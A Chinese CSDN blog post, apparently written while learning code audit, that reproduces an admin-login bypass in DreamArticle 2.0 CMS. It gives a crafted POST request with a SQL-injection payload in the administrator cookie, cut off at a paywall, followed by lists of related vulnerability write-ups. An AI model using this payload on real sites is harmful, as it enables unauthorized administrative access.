DreamArticle2.0后台登录漏洞复现

最新推荐文章于 2024-08-03 17:24:15 发布
最新推荐文章于 2024-08-03 17:24:15 发布
阅读量513 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kekefen01/article/details/88600834
版权
本文介绍了DreamArticle 2.0 CMS的一个后台登录漏洞,通过分析验证过程,揭示了利用URL解码绕过机制进行非法登录的方法。作者在尝试复现漏洞时,发现可以通过编辑Chrome的cookie来构造请求,并讨论了2.0版本与网上公开的3.0版本的不同之处。同时,文中还提到了在Burp Suite的使用过程中遇到的意外发现,即在特定环境下,即使不设置代理,Burp的网络包也能在PHPStorm中进行debug。
摘要由CSDN通过智能技术生成

一个很老的CMS了。
最近在学代码审计,看到网上有人提到这里的漏洞就想复现出来。先上图
在这里插入图片描述
原文:
利用DreamArticle 后台验证漏洞直接登陆后台:
http://www.webjx.com/security/leak-11941.html

构造以下post请求

POST /da/admin/index.php HTTP/1.1
...
Cookie: PHPSESSID=ci49apcu773lhpug1vd6kv6ub1; iDreamSoft_iCMS_AUTH=9ac6MxBR983xzuQb2oTLXuK%2BYVCAWytYzUACr6%2Fztq2yb6gJquFK8F4tEyXZwDns6YvUbBDaHENODiHjAYUJL0f54QtjvqswkWmwbRrV3CVprtRZgw; XDEBUG_SESSION=PHPSTORM; iDreamSoft_admincode=2126; 

#关键的两个cookie:
iDreamSoft_administrator=dsaf%2527 union select database()#; 
iDreamSoft_adminpassword=dreamarticle;

username=admin&password=adsdadn&codestr=2126&action=l

在chrome中安装EditThisCookie添加cookie(其实我今天手抖,双击了两下开发者工具中的application->storage-cookie下的空行居然可以直接添加cookie,但是后来无法复现了。)
本地修改action的值就可以提交

漏洞原理(2.0版本和网上文章的3.0版本还是有些不一样的):

admin/global.php

$adminid	=intval(get_cookie("adminid"));
$administrator	=get_cookie("administrator");
$adminpassword	=get_cookie("adminpassword");

// 验证是否处于登陆状态
if ($administrator && $adminpassword && get_cookie(
最低0.47元/天 解锁文章
kekefen01
关注
登录界面漏洞
m0_55772907的博客
04-30 7146
登录页面可能产生哪些漏洞呢? 1、注入点及万能密码登录 2、登录时,不安全的用户提示:比如提示用户名不存在或者密码验证码错误 3、查看登录页面源代码,看是否存在敏感信息泄露 4、不安全的验证码 5、在注册账号的时候,是否存在不安全的提示 6、不安全的密码,在注册账号的时候密码没有限制复杂度 7、任意无限注册账号 8、在暴力破解的时候不会限制ip,锁定用户 9、一个账号可以在多地登录,没有安全提示 10、账户登录之后,没有具备超时功能 11、OA,邮件,默认账号等相关系统,在不是自己注册
后台登陆漏洞修补
manylen
05-21 521
在登陆后台时,接收用户输入的Userid和Password数据,并分别赋值给user和pwd,然后再用 sql="select * from admin where username="&user&" and password="&pwd&""这句来对用户名和密码加以验证。 以常理来考虑的话,这是个很完整的程序了,而在实际的使用过程中,整套程序也的确可能正常使用。但是如果Userid的值和pa
常见cms漏洞之ASPCMS
最新发布
ineedmoreMuQ的博客
08-03 385
漏洞复现,使用后台配置文件拿shell。
php注入后台,用SQL注入漏洞登录后台
weixin_29207533的博客
03-23 538
在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。轻则数据遭到泄露,重则服务器被拿下。现在,很多网站开发人员知其然而不知其所以然,小弟也是,所以赶紧恶补下,总结如学习内容。希望对初学者能够起到抛砖引玉的作用。一、SQL注入的步骤a) 寻找注入点(如:登录界面、留言板等)b)...
梦想cms-v1.4-后台存在任意文件读取漏洞
慢就是快
03-29 1569
我的第一个CNVD编号:CNVD-2020-10212 实验环境:win7 专业版 梦想cms v1.4 phpstudy 漏洞位置: template\admin\Template\temedit.html目录下的模版编辑功能 发现该地方直接将路径和文件名进行了拼接,其中代码关键在于变量$dir的获取 搜索editfile函数 发现$dir直接通过GET方式进行获取,没有进行过滤,且直接拼接进文件内容请求链接。 漏洞链接为: xxx.com/admin.php?m=Template&a=ed
服务端和客户端在线考试系统
m0_63755946的博客
11-05 174
【代码】服务端和客户端在线考试系统。
DreamArticle文章管理网站源码 V2.0GBK
03-26
2.0更新说明 重写源代码 支持URL重写 文章支持自定义URL 增加图片水印功能 增加TAG功能 增加DIGG功能 增加语言包 增加模板标记 更换广告模板标签原<!--{advertise}-->更新换为<!--{DreamCMS:advertise}--&...
新闻文章DreamArticle 文章管理程序 v2.0 UTF-8-dreamarticle.rar
04-08
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。...【项目质量】:所有源码都经过严格测试,可以直接...
[新闻文章]DreamArticle 文章管理程序 v2.0 UTF-8_dreamarticle.rar
04-20
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。...【项目质量】:所有源码都经过严格测试,可以直接...
DreamArticle 文章管理系统 v3.0 GBK Build 20090403
05-01
功能说明: 这次只修复一个比较大的BUG修复静态按日期生成模式错误 修复留言提交之后无返回错误 修改广告管理 全部生成静态JS调用 修复搜索 TAG 分页错误DreamArticle V3.0...请关注 更强大的版本 DreamArticle V3.1
【中间件漏洞】Apache HTTPD 漏洞全集复现(基于Vulhub平台)
Continuejww的博客
09-11 854
①CVE-2017-15715 ②多后缀解析漏洞 ③远程命令执行漏洞 ④CVE-2021-41773 ⑤CVE-2021-42013 ⑥CVE-2021-40438
X-admin-v2.2.rar
08-15
X-admin是一个基于layui的轻量级前端后台管理框架,简单免费,兼容性好,面向所有层次的前后端程序。创立于2017年初,为了敏捷WEB应用开发和简化企业应用开发而诞生的。X-admin从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发前端后台框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。 商业友好的开源协议 X-admin遵循Apache2开源协议发布。Apache Licence是著名的非盈利开源组织Apache采用的协议。该协议和BSD类似,鼓励代码共享和尊重原作者的著作权,同样允许代码修改,再作为开源或商业软件发布。
春秋云境靶场CVE-2022-32991漏洞复现(sql手工注入)
zyh1588的博客
11-14 1309
小白复现CVE-2022-32991漏洞,该CMS的welcome.php中存在SQL注入攻击......
XXE漏洞复现
春日野穹
10-23 3024
引言~ XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 实验环境~ PHP版本:5.4.45 中间件:apache 复现平台:皮卡丘漏洞练习平台 libXML编译版本:2.7.8 libxm...
脏牛提权(靶机复现
tubug的博客
03-26 2574
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
解决X-admin2.0后台登录时获取不到data的原因
小明同学
02-23 283
首先第一个看html标签是否是成对出现的 第二个就是 from标签里面是否有 class=“layui-form” 这样就可以解决如上问题 <form method="post" class="layui-form" onsubmit="return false"> <input name="username" placeholder="用户名" type="text" lay-verify="username" class="layui-input"
漏洞复现之YApi接口管理平台远程代码执行
白帽子九一
05-31 1136
1. 简介 YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI旨在为开发、产品和测试人员提供更优雅的接口管理服务,可以帮助开发者轻松创建、发布和维护不同项目,不同平台的API。有了YAPI,我们可以很方便的测试、管理和维护多个项目的API接口,不像Swagger那样是随应用生和灭的(且线上环境下大多数须关闭),YAPI是一个独立的服务平台
bootstrap踩坑记录
weixin_34187822的博客
08-28 366
PC端开发的过程中,导航栏部分使用了bootstrap的tab方法。使用过程中遇到了一些问题如图: 鼠标快速划过多个导航的时候,会同时触发多个。 解决办法是更改bootstrap源码: 修改bootstrap.js文件,把下图中的部分做修改,直接执行next方法 ...
浅谈struts2漏洞(检测工具及S2-052漏洞漏洞平台的搭建复现
Ping_Pig的博客
09-28 5039
简介: struts2是apache项目下的一个web框架,主要应用于各类门户网站,而相对应的漏洞则是从2007年7月23日发布的第一个Struts2漏洞S2-001到2018年的S2-057,跨度还是很多的,以前学习的时候也是听说,基本上Struts每发布一个版本都会存在漏洞,根据Freebuf上的文章显示,漏洞的类型基本上是RCE,XSS,CSRF,DOS,目录遍历和其他功能缺陷漏洞等。风靡...
PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)
hclimg的博客
10-30 2307
phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞复现环境:基于某平台的在线靶场进行漏洞复现 复现过程: 1. 访问网址,是一处phpmyadmin的登录地址首页,通过弱密码可以进入数据库管理界面 2. 根据在网上曝光的CVE-2018-1...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值